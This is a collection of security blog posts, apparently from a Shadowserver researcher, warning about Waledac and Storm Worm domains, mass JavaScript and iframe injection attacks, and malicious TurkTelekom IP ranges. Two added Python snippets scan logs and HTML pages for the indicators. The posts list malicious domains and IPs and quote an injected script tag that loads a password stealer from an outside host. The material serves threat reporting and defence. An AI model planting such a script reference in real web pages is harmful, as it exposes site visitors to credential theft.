Full Waledac Domain Listing

January 24th, 2009 by Steven Adair

The full list is also being updated and posted on the Shadowserver website at the following URL:

http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt

However, I just wanted to reiterate that you should block all of these domains:


Waledac Exploit Domain List:

googol-analisys.com
seocom.name
seocom.mobi
seofon.net

—-

Also, if you are interested in all things Waledac (omghi2u!), check out Jeremy’s Waledac tracker here:

http://sudosecure.net/waledac/

Posted in Malware, Waledac, Exploits, Botnets, Spam, Storm Worm | No Comments »

Red Hat & Fedora Servers Compromised - Check Your SSH Packages

August 24th, 2008 by Steven Adair

Woops! It looks like multiple servers belonging to the Red Hat and Fedora projects were compromised last week. It’s always unfortunate when this sort of thing happens, especially when the attackers make modifications to the SSH packages. Fortunately the issue only affects a few versions of the packages and only existed for a short time. There have been various announcements and mailing list postings on this issue that can be viewed here and here.

Potentially affected OS versions that may have received these updates:

Red Hat Desktop (v. 4)
Red Hat Enterprise Linux (v. 5 server)
Red Hat Enterprise Linux AS (v. 4)
Red Hat Enterprise Linux AS (v. 4.5.z)
Red Hat Enterprise Linux Desktop (v. 5 client)
Red Hat Enterprise Linux ES (v. 4)
Red Hat Enterprise Linux ES (v. 4.5.z)
Red Hat Enterprise Linux WS (v. 4)

You can grab the OpenSSH blacklist script from the Red Hat website by clicking here. This script can be run by a non-privileged user to check whether the OS has any of the listed malicious packages installed.

Posted in Malware, Exploits, Random | No Comments »

Update Your Adobe Flash Software ASAP!

May 27th, 2008 by Steven Adair

It appears there are now Adobe Flash exploits live and in the wild on several sites. This is not good, considering some of the websites involved in the recent mass SQL injection attacks are aiming to exploit this vulnerability. Basically, if you can’t recall upgrading Flash recently, you probably need to go ahead and do it.

You can check your current flash version by clicking here.

You can upgrade to the latest version of flash by clicking here.

Don’t wait - just upgrade right now!

Posted in Malware, Exploits, Random | 1 Comment »

New Storm Worm Domains Active with Exploits

April 10th, 2008 by Steven Adair

It appears that in addition to “supersameas.com”, the Storm Worm is now using and spamming itself out with several new domain names. These domain names are all with Chinese registrars and have been around since at least February, but are just now starting to be used. In addition to serving up the executables for download, they are also attempting to fire exploits at users running the Internet Explorer browser. It is highly recommended that you do NOT visit these domains. Here is the list that is currently active:


They are coming through via e-mail as always and continuing their assault against Blogger (blogspot.com) sites. Searching Google shows the standard “love” related campaign. However, there is at least one result on Google showing politically motivated e-mails that are being sent as well. At least one spam message reported on the Google group “news.admin.net-abuse.sightings” shows an e-mail with the subject “Cowen confirmed as next Irish premier Options” and a body of “Police fire on protesters in Nepal” followed by a link to one of the above domains.

If you visit these sites with IE, you will quickly find yourself being attacked via different ActiveX objects. The first set of exploits will attempt to download “load.exe” to the system. It will then ultimately redirect the visitor to “flow.php” which is full of obfuscated JavaScript. It is recommended that you block the above domain names and do not visit them.
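Since the post recommends blocking the domains and describes the two-stage fetch (“load.exe”, then “flow.php”), here is an added example, not part of the original post, of how a defender might triage proxy logs for it: it flags any request to a listed domain (including subdomains) and ranks a request for one of the exploit-chain paths higher, so hosts that actually pulled the payload stand out. The log lines and the second and later indicators are constructed; only supersameas.com and the two paths come from the post.

```python
import re
from urllib.parse import urlsplit

# Indicators from the post above; extend with the rest of the published list.
STORM_DOMAINS = {"supersameas.com"}
# Paths fetched by the exploit chain described in the post.
STORM_PATHS = ("/load.exe", "/flow.php")

# Constructed Squid-style access log lines: "timestamp client method url status".
SAMPLE_LOG = """\
1207814400.123 10.0.0.5 GET http://www.example.com/index.html 200
1207814401.456 10.0.0.7 GET http://supersameas.com/ 200
1207814402.789 10.0.0.7 GET http://www.supersameas.com/load.exe 200
1207814403.000 10.0.0.7 GET http://supersameas.com/flow.php 200
1207814404.321 10.0.0.9 GET http://supersameas.com.example.org/ 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<status>\d+)"
)


def matches_domain(host, domains=STORM_DOMAINS):
    """True if host is a listed domain or a subdomain of one (suffix match on a label boundary)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def scan_log(text, domains=STORM_DOMAINS, paths=STORM_PATHS):
    """Return (client, host, severity) for each request to a listed domain.

    severity is 'payload' when the path is one of the exploit-chain files,
    otherwise 'contact' (the client only touched the domain)."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the log format
        parts = urlsplit(m["url"])
        host = parts.hostname or ""
        if not matches_domain(host, domains):
            continue
        severity = "payload" if parts.path.lower().endswith(paths) else "contact"
        hits.append((m["client"], host, severity))
    return hits


def clients_with_payload(hits):
    """Clients that fetched an exploit-chain file and should be triaged first."""
    return sorted({client for client, _, sev in hits if sev == "payload"})


if __name__ == "__main__":
    for client, host, severity in scan_log(SAMPLE_LOG):
        print(f"{severity:8} {client} -> {host}")
    print("triage first:", clients_with_payload(scan_log(SAMPLE_LOG)))
```

The last sample line shows why the suffix check is anchored on a label boundary: a lookalike such as supersameas.com.example.org must not match.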

Posted in Malware, Exploits, Spam, Storm Worm | No Comments »

Chinese JavaScript Attack and Mass IFrame Injection Different

March 15th, 2008 by Steven Adair

Hello to all who find this page. I’d like to see if I can at least try to clear up some confusion for a few of you out there. There has been a lot of coverage over the last few days on two completely different attacks that somehow end up being linked together. We will look at both issues, describe them, and show how these attacks are not the same.

Chinese JavaScript Injection Attack

Over the past ten days or so, the following code has found its way into the actual source code of several thousand web pages:

<script src=http://www.2117966.net/fuckjp.js></script>

This JavaScript would attempt to do several things and load other files that would attempt to exploit the visitor. With this attack there are *NO* iframe tags involved. Just take a look at the above line of code: that is exactly what was injected. This is almost identical to the “uc8010.com” attacks a few months ago. In fact, we were able to find a few pages that appear to have had the line of code above injected right into the middle of where they used to refer to uc8010.com. In my opinion it looks very similar but seems to have different goals. In any event, if you get malware from the latest go-around of these attacks, it will be stealing the passwords that you send with Internet Explorer.

An interesting side note worth mentioning is that Trend Micro’s own website was hit with this attack. They had several pages, which can still be viewed in Google’s cache, that were injected with the above script. It just goes to show this kind of unfortunate thing can happen to anyone.

IFrame Injection Attack

The other attack that is getting a lot of attention is one that’s labeled an IFrame injection attack. However, in these instances the websites themselves are NOT actually hacked. Rather, there is a lack of input validation, and the attackers are able to get search results containing links to malicious websites (via an IFrame) cached on the site. In theory they could have just as easily put in a JavaScript reference; it just happens they used an IFrame in the search terms that get cached. The websites themselves have not been compromised (i.e. if you just legitimately browsed the website, you would not find yourself under attack). It appears some of the malicious sites are attempting to exploit vulnerabilities in the user’s system and others are presenting fake errors about needing a video codec. From what I have seen and what has been reported, the Zlob trojan is the target install for a lot or most of this stuff. You can read more information and see examples of this at http://ddanchev.blogspot.com/.
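To help site owners tell the two cases apart in their own page source, here is an added example (not code from the original post) that scans HTML for external `<script>` and `<iframe>` references pointing at a listed host, reports which tag type carried the reference, and handles the unquoted `src=` form shown above. Only 2117966.net and uc8010.com come from the posts; the sample page is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts named in the posts above; extend with your own feed.
BAD_HOSTS = {"2117966.net", "uc8010.com"}


def host_is_bad(url, bad_hosts=BAD_HOSTS):
    """True if the URL's host is a listed host or a subdomain of one."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    return any(host == b or host.endswith("." + b) for b in bad_hosts)


class InjectionFinder(HTMLParser):
    """Collect external <script> and <iframe> references that point at listed hosts."""

    def __init__(self, bad_hosts=BAD_HOSTS):
        super().__init__()
        self.bad_hosts = bad_hosts
        self.hits = []  # (tag, src, line number) tuples

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        src = dict(attrs).get("src")  # html.parser accepts unquoted values too
        if src and host_is_bad(src, self.bad_hosts):
            line, _ = self.getpos()
            self.hits.append((tag, src, line))


def find_injections(html, bad_hosts=BAD_HOSTS):
    """Parse a page and return every script/iframe reference to a listed host."""
    parser = InjectionFinder(bad_hosts)
    parser.feed(html)
    parser.close()
    return parser.hits


# Constructed sample page: a legitimate local script, the unquoted injected
# script tag in the form seen above, and a hidden iframe to the older host.
SAMPLE = """<html><head>
<script src="/js/site.js"></script>
<script src=http://www.2117966.net/fuckjp.js></script>
</head><body>
<iframe src="http://www.uc8010.com/x.htm" width=0 height=0></iframe>
</body></html>"""

if __name__ == "__main__":
    for tag, src, line in find_injections(SAMPLE):
        print(f"line {line}: <{tag}> references listed host: {src}")
```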

Conclusion

As you can see, these are completely unrelated attacks. Other than the fact they involve the Internet and getting malware on a user’s system, there is really no other correlation. However, either group behind both attacks could easily use the techniques of the other, as could any other group. We have seen some interesting tricks from the bad guys lately. We’ll have to see what they come up with next.

Steven

Posted in Malware, Exploits | No Comments »

Mass Infection of Websites Aimed at Stealing Your Passwords!

March 14th, 2008 by Steven Adair

There has been another round of websites being attacked and having malicious JavaScript links placed into them. This causes visitors to legitimate websites that have been hacked to load a malicious JavaScript file from a Chinese website. The website 2117966.net (125.46.105.224) should be blocked or monitored where possible! Please do not visit this website. The JavaScript will load other files and attempt to exploit several vulnerabilities to compromise the end user. If a compromise is successful, a password stealer will be loaded on the system. The program will attempt to send keylogged data to another server in China at the IP address 61.188.39.175.

Please be on the lookout for these websites and IPs on your network. You can read the full blog post, with links to other sites reporting this issue, at http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313

Posted in Malware, Exploits | No Comments »

Abdallah Internet Hizmetleri Dead?

March 4th, 2008 by Steven Adair

Well, it looks like there might be good news regarding Abdallah_Internet Hizmetleri, a group that owned a few IP ranges on TurkTelekom. It appears they might no longer be operational. As of late last night or early today, all routes going to 88.255.90.0/24 and 88.255.94.0/24 appear to have gone dead. Part of the WHOIS record now reads as follows:

    person: Mahmod AbdAllah el Gashmi
    address: SISTEMNET TELEKOM BLACKLISTED PERSON
    e-mail: admin@sistemnet.com.tr
    phone: +902122666060
    remarks: ——————————————————
    remarks: SISTEMNET TELEKOM BLACKLISTED PERSON
    remarks: For Abuse Contact : abuse@sistemnet.com.tr
    remarks: SISTEMNET TELEKOM BLACKLISTED PERSON
    remarks: SISTEMNET TELEKOM BLACKLISTED PERSON
    remarks: ——————————————————

This is pretty good news, as we have previously blogged about these IP ranges here. One of my Shadowserver colleagues also just recently published a whitepaper about AbdAllah Internet Hizmetleri. It would be awesome if this is what ultimately pulled the plug. You can read the whitepaper entitled “RBN Rizing” in the whitepapers section on the Shadowserver website, or view the RBN Rizing document directly. Happy reading and good riddance (?) to AbdAllah_Internet! :D

Posted in Malware, Exploits, RBN, Random | No Comments »

Some TurkTelekom IP Ranges Aren’t Your Friends

December 9th, 2007 by Steven Adair

Do a WHOIS on an IP address in 88.255.0.0/16 and you will get back something like this as part of your response:

% Information related to '88.255.0.0/16AS9121'

route: 88.255.0.0/16
descr: TurkTelekom
origin: AS9121
mnt-by: AS9121-MNT
source: RIPE # Filtered

Now, not everything on 88.255.0.0/16 or AS9121 is evil. However, there are some ranges that are definitely pretty bad. We have been seeing a lot of malware out of some of these ranges for a while. Even some of the stuff that used to be housed on the main Russian Business Network IP ranges has moved here. Remember the Virut trojan that used “proxima.ircgalaxy.pl” as part of its operation and used to be on RBN IP space? Well, it’s now at 88.255.74.140.

Now let’s give you a list of some of the ranges you should be concerned about.

88.255.90.0/24
88.255.91.0/24
88.255.92.0/24
88.255.93.0/24
88.255.94.0/24
88.255.74.0/24

The first five IP ranges belong to AbdAllah Internet Hizmetleri (AbdAllah_Internet) and are particularly nasty. Some of the ranges are seen a lot more than others, but there’s a pretty consistent pattern in what is housed here. All kinds of drive-by exploit sites are on these IP addresses. Most of them seem to be geared towards information theft. A number of Nethell, Pinch, and other infostealer/banker trojans are live on those IPs.

The sixth and last IP range above is listed under “AKSERVERS_INTERNET_HIZMETLERI”. No idea if these are somehow related, but this subnet also hosts a lot of the same bad stuff. Consider blocking these ranges or monitoring what goes in and out to them from your networks.

Posted in Malware, Exploits, RBN | 1 Comment »

Apple QuickTime 7.x RTSP Exploit Gets Worse (OS X)

November 29th, 2007 by Steven Adair

In case you haven’t seen it, a vulnerability and exploit code have recently been released for Apple QuickTime 7.x (confirmed on 7.3, and the exploit code says 7.2 also). You can read details of the issue at http://www.kb.cert.org/vuls/id/659761. This first came to light 6 days ago and is currently unpatched. A steady stream of exploits has appeared on milw0rm, each modifying the exploit to support more operating systems and browsers. The latest release today now apparently works on Mac OS X. To make things even worse for Apple, there is a CVE from 2002 seemingly describing this exact issue in QuickTime 5.0.1 and 5.0.2.

Anyway, if you’ve got QuickTime installed be careful where you browse and be on the lookout for an update to patch this issue.

Posted in Exploits, Mac | No Comments »